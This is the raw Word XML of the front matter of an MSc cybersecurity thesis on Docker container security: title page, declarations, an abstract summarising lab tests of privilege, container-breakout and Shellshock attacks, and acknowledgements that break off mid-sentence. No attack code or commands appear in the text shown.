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80EE5" w14:textId="1CF801EA" w:rsidR="00B669F0" w:rsidRDefault="00100AC7" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0087446F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F5B846D" wp14:editId="64F4277B">
            <wp:extent cx="3114281" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 16"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0938" cy="1250442"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E2634" w14:textId="77777777" w:rsidR="00490073" w:rsidRDefault="00490073" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCDA041" w14:textId="1F1DCBF5" w:rsidR="00BD5D1A" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Examining Docker Containers Security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A25018" w14:textId="286F4C1E" w:rsidR="00100AC7" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00100AC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B1CD1E" w14:textId="4E16E658" w:rsidR="00F9587B" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Yohannes Zerzghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E926D61" w14:textId="68008009" w:rsidR="00100AC7" w:rsidRPr="00490073" w:rsidRDefault="00100AC7" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Supervisor: Dr Carlene E-A Campbell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA870FF" w14:textId="69C1A5F5" w:rsidR="00100AC7" w:rsidRDefault="00F9587B" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00100AC7" w:rsidRPr="00490073">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Second Marker: Dr Nitheesh Kaliyamurthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD726C" w14:textId="77777777" w:rsidR="00490073" w:rsidRPr="00490073" w:rsidRDefault="00490073" w:rsidP="00100AC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EBD2004" w14:textId="7F0BA0D6" w:rsidR="00490073" w:rsidRDefault="00490073" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Project submitted as part of the requirements for the award of MSc Computer Networks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Cybers</w:t>
      </w:r>
      <w:r w:rsidRPr="00490073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2630F8" w14:textId="77777777" w:rsidR="00F9587B" w:rsidRPr="00490073" w:rsidRDefault="00F9587B" w:rsidP="00F9587B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FBE39E" w14:textId="11A56643" w:rsidR="00490073" w:rsidRPr="00F9587B" w:rsidRDefault="00490073" w:rsidP="00100AC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9587B">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Nov 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797F5628" w14:textId="5526371E" w:rsidR="00100AC7" w:rsidRDefault="00100AC7" w:rsidP="00B669F0"/>
    <w:p w14:paraId="361D4DD2" w14:textId="1D3F358D" w:rsidR="005C7C0D" w:rsidRDefault="005C7C0D" w:rsidP="00B669F0"/>
    <w:p w14:paraId="1CF627E9" w14:textId="77777777" w:rsidR="005C7C0D" w:rsidRDefault="005C7C0D" w:rsidP="00B669F0"/>
    <w:p w14:paraId="552D3F2E" w14:textId="6EA925F2" w:rsidR="00100AC7" w:rsidRDefault="00F9587B" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9587B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Declaration of originality </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21B87C" w14:textId="77777777" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D18E00" w14:textId="7E7BCAE6" w:rsidR="00F9587B" w:rsidRDefault="00F9587B" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I am </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Yohannes Zerzghi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, I declare that I am the sole author of this project; that all references cited have been consulted; that I have conducted all work of which this is a record, and that the finished work lies within the prescribed word limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23C992" w14:textId="0D66729D" w:rsidR="00F9587B" w:rsidRDefault="00F9587B" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This work has not previously been accepted as part of any other degree submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E47A363" w14:textId="73F86DD7" w:rsidR="00F9587B" w:rsidRDefault="00F9587B" w:rsidP="00030C2F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030C2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Signed: Yohannes Zerzghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78227DD8" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRPr="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC4B09F" w14:textId="11E73CCC" w:rsidR="00F9587B" w:rsidRDefault="00030C2F" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                            </w:t>
      </w:r>
      <w:r w:rsidR="00F9587B" w:rsidRPr="00030C2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Date: 12/11/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F142729" w14:textId="77777777" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A178DEE" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRPr="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00030C2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB9ED5D" w14:textId="04ACB450" w:rsidR="00F9587B" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030C2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">FORM OF CONSENT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708E1429" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRPr="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E26CE21" w14:textId="5ADDF5D2" w:rsidR="00F9587B" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I am </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Yohannes Zerzghi</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, hereby that my project, submitted in candidature for the MCs Computer Networks and Cybersecurity degree, if successful, may be made available for inter-library loan or photocopying (subject to the law of copyright) and that the title abstract may be made available to outside organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B459DCD" w14:textId="5E42C127" w:rsidR="00030C2F" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00ED71DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signed: Yohannes Zerzghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8CE68" w14:textId="77777777" w:rsidR="00030C2F" w:rsidRDefault="00030C2F" w:rsidP="00B669F0"/>
    <w:p w14:paraId="5BFEB6C2" w14:textId="29110984" w:rsidR="00030C2F" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00ED71DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Date: 12/11/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6C47A" w14:textId="77777777" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00B669F0"/>
    <w:p w14:paraId="5D4E4051" w14:textId="52D1CA9C" w:rsidR="00030C2F" w:rsidRPr="00F43EC2" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright Acknowledgement </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D56E3E" w14:textId="0BACBEC9" w:rsidR="00030C2F" w:rsidRPr="00ED71DE" w:rsidRDefault="00030C2F" w:rsidP="00B669F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED71DE">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I acknowledge that the copyright of this project report, and any product developed as part of the project, belong to the University of Wales Trinity Saint David, Swansea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE19CD" w14:textId="5556A1E8" w:rsidR="00ED71DE" w:rsidRDefault="00ED71DE" w:rsidP="00B669F0"/>
    <w:p w14:paraId="778E15F2" w14:textId="77777777" w:rsidR="00F43EC2" w:rsidRDefault="00F43EC2" w:rsidP="00B669F0"/>
    <w:p w14:paraId="55364E9C" w14:textId="462B963B" w:rsidR="00B669F0" w:rsidRDefault="00ED71DE" w:rsidP="008C4896">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc87032880"/>
      <w:r w:rsidRPr="00ED71DE">
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRACT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00ED71DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F21CA" w14:textId="591CD7F4" w:rsidR="00480C4E" w:rsidRDefault="00480C4E" w:rsidP="00B669F0">
      <w:r>
        <w:t xml:space="preserve">In recent years, Docker has become a prominent virtualisation tool for deploying applications in cloud </w:t>
      </w:r>
      <w:r w:rsidR="00E947D6">
        <w:t xml:space="preserve">computing architectures due to its agility, flexibility, reliability, scalability, and many other benefits. As a result, its popularity is gaining momentum </w:t>
      </w:r>
      <w:r w:rsidR="00106F1E">
        <w:t>in the containerisation industry and cloud users, specifically within developers and DevOps.</w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="0046175F">
        <w:t>its security platform is not mature yet and creat</w:t>
      </w:r>
      <w:r w:rsidR="00E61FE9">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="0046175F">
        <w:t xml:space="preserve"> a big concern among its users and cloud practitioners. One of its main security issues is</w:t>
      </w:r>
      <w:r w:rsidR="00E61FE9">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="0046175F">
        <w:t xml:space="preserve"> Docker does not provide more splendid isolation between the host and </w:t>
      </w:r>
      <w:r w:rsidR="00C77540">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="00E61FE9">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00C77540">
        <w:t>between themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42959477" w14:textId="7C967F49" w:rsidR="00CE18CB" w:rsidRDefault="00451240" w:rsidP="00B669F0">
      <w:r>
        <w:t>In this thesis,</w:t>
      </w:r>
      <w:r w:rsidR="00A24617">
        <w:t xml:space="preserve"> we are </w:t>
      </w:r>
      <w:r w:rsidR="00626C55">
        <w:t xml:space="preserve">engaged to </w:t>
      </w:r>
      <w:r w:rsidR="00DD1343">
        <w:t xml:space="preserve">examine Docker containers security using three different </w:t>
      </w:r>
      <w:r w:rsidR="00CC310C">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00786F23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00965A53">
        <w:t xml:space="preserve">to evaluate and test its current security </w:t>
      </w:r>
      <w:r w:rsidR="00AE4E84">
        <w:t>system.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EF2">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="00F8248F">
        <w:t xml:space="preserve"> pragmatic approach is </w:t>
      </w:r>
      <w:r w:rsidR="00F24A48">
        <w:t xml:space="preserve">developed </w:t>
      </w:r>
      <w:r w:rsidR="00FB6395">
        <w:t xml:space="preserve">established </w:t>
      </w:r>
      <w:r w:rsidR="00AA6372">
        <w:t>upon</w:t>
      </w:r>
      <w:r w:rsidR="009A0C88">
        <w:t xml:space="preserve"> a comprehe</w:t>
      </w:r>
      <w:r w:rsidR="00E1254D">
        <w:t>nsive background research and literature review</w:t>
      </w:r>
      <w:r w:rsidR="00DD5205">
        <w:t xml:space="preserve"> aiming</w:t>
      </w:r>
      <w:r w:rsidR="0007629E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A86A7B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00E46F82">
        <w:t>carry out the security attacks</w:t>
      </w:r>
      <w:r w:rsidR="008B5953">
        <w:t xml:space="preserve"> in a methodo</w:t>
      </w:r>
      <w:r w:rsidR="00386755">
        <w:t>logical way</w:t>
      </w:r>
      <w:r w:rsidR="00E46F82">
        <w:t xml:space="preserve"> on a Docker </w:t>
      </w:r>
      <w:r w:rsidR="00244ED8">
        <w:t xml:space="preserve">platform </w:t>
      </w:r>
      <w:r w:rsidR="00E46F82">
        <w:t xml:space="preserve">hosted on a single Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="008E1352">
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidR="00E76A74">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B2653" w14:textId="698B24AF" w:rsidR="00DC2C1D" w:rsidRDefault="00400C0A" w:rsidP="00B669F0">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D6587C">
        <w:t>his report</w:t>
      </w:r>
      <w:r w:rsidR="00FC2460">
        <w:t xml:space="preserve"> has</w:t>
      </w:r>
      <w:r w:rsidR="00D6587C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E21974">
        <w:t xml:space="preserve">conducted </w:t>
      </w:r>
      <w:r w:rsidR="00036EE6">
        <w:t xml:space="preserve">three Docker security attacks: privilege, </w:t>
      </w:r>
      <w:r w:rsidR="008B0D71">
        <w:t>containers breakout</w:t>
      </w:r>
      <w:r w:rsidR="00B459B5">
        <w:t>, and using vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="00844641">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C5C15">
        <w:t xml:space="preserve"> The first two attacks </w:t>
      </w:r>
      <w:r w:rsidR="00A97AF4">
        <w:t xml:space="preserve">use scripts </w:t>
      </w:r>
      <w:r w:rsidR="00ED2822">
        <w:t>written in Dockerfile to</w:t>
      </w:r>
      <w:r w:rsidR="00157F8A">
        <w:t xml:space="preserve"> examine and </w:t>
      </w:r>
      <w:r w:rsidR="00DA451E">
        <w:t>undertake the</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> security attacks</w:t>
      </w:r>
      <w:r w:rsidR="00FC2460">
        <w:t>. In contrast,</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> the last one </w:t>
      </w:r>
      <w:r w:rsidR="00212B57">
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidR="003A2C4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="003A2C4D">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="003A2C4D">
        <w:t xml:space="preserve"> vulnerable to</w:t>
      </w:r>
      <w:r w:rsidR="006F3567">
        <w:t xml:space="preserve"> shellshock</w:t>
      </w:r>
      <w:r w:rsidR="00956B9F">
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
      <w:r w:rsidR="00695108">
        <w:t xml:space="preserve"> downloaded </w:t>
      </w:r>
      <w:r w:rsidR="001E5001">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="00D246ED">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001E5001">
        <w:t>Docker Hub to impersonate</w:t>
      </w:r>
      <w:r w:rsidR="00333683">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E06BC">
        <w:t>on how attackers can infiltrate through vulnerable application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47007D97" w14:textId="147389A2" w:rsidR="002D2D8A" w:rsidRDefault="002D2D8A" w:rsidP="00B669F0">
      <w:r>
        <w:t xml:space="preserve">The results </w:t>
      </w:r>
      <w:r w:rsidR="00822234">
        <w:t>of the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00AE6C80">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00822234">
        <w:t xml:space="preserve"> show</w:t>
      </w:r>
      <w:r w:rsidR="00123A24">
        <w:t xml:space="preserve"> that Docker security is far from perfect, </w:t>
      </w:r>
      <w:r w:rsidR="00704EDA">
        <w:t>mainly</w:t>
      </w:r>
      <w:r w:rsidR="00822FC5">
        <w:t xml:space="preserve"> working with privileged us</w:t>
      </w:r>
      <w:r w:rsidR="00005D7A">
        <w:t>ers</w:t>
      </w:r>
      <w:r w:rsidR="00D90AAC">
        <w:t xml:space="preserve">. For this reason, </w:t>
      </w:r>
      <w:r w:rsidR="00981284">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00A74C02">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="00D63BF8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A74C02">
        <w:t xml:space="preserve">strong </w:t>
      </w:r>
      <w:r w:rsidR="00EC135E">
        <w:t>recommendation regarding</w:t>
      </w:r>
      <w:r w:rsidR="00143AF5">
        <w:t xml:space="preserve"> the consequence </w:t>
      </w:r>
      <w:r w:rsidR="00D12BA5">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00915C3E">
        <w:t>running containers with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="0016568C">
        <w:t xml:space="preserve"> as this allows </w:t>
      </w:r>
      <w:r w:rsidR="001B534B">
        <w:t>to malicious users escape</w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F72CE6">
        <w:t xml:space="preserve">their privilege </w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t>easily</w:t>
      </w:r>
      <w:r w:rsidR="001B534B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F72CE6">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00597D4C">
        <w:t xml:space="preserve">perform </w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t>malicious act</w:t>
      </w:r>
      <w:r w:rsidR="00F72CE6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F24DC6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754EC22" w14:textId="1F98FBF5" w:rsidR="007D40E1" w:rsidRDefault="00B116BA" w:rsidP="00B669F0">
      <w:r w:rsidRPr="007433C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keywords</w:t>
      </w:r>
      <w:r w:rsidR="007433C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007B43BC">
        <w:t xml:space="preserve">Docker, </w:t>
      </w:r>
      <w:r w:rsidR="00777FDB">
        <w:t xml:space="preserve">virtualisation, containerisation, </w:t>
      </w:r>
      <w:r w:rsidR="00291E7C">
        <w:t>namespaces, Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="0072729E">
        <w:t>, containers, images,</w:t>
      </w:r>
      <w:r w:rsidR="00EE5746">
        <w:t xml:space="preserve"> isolation, privilege</w:t>
      </w:r>
      <w:r w:rsidR="007D40E1">
        <w:t>, container breakout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59800619" w14:textId="77777777" w:rsidR="00620175" w:rsidRDefault="00620175">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73D1C3" w14:textId="55D8AFAA" w:rsidR="00B116BA" w:rsidRDefault="008C4896" w:rsidP="008C4896">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc87032881"/>
      <w:r w:rsidRPr="008E37E5">
        <w:lastRenderedPageBreak/>
        <w:t>ACKNOWLEDGEMENTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="008E37E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C99DB2D" w14:textId="1FCE2C72" w:rsidR="00B669F0" w:rsidRDefault="001441C9" w:rsidP="00B669F0">
      <w:r>
        <w:t xml:space="preserve">I would like to thank </w:t>
      </w:r>
      <w:r w:rsidR="00743D14">
        <w:t xml:space="preserve">my esteemed supervisor </w:t>
      </w:r>
      <w:r w:rsidR="00743D14" w:rsidRPr="00102C63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dr</w:t>
      </w:r>
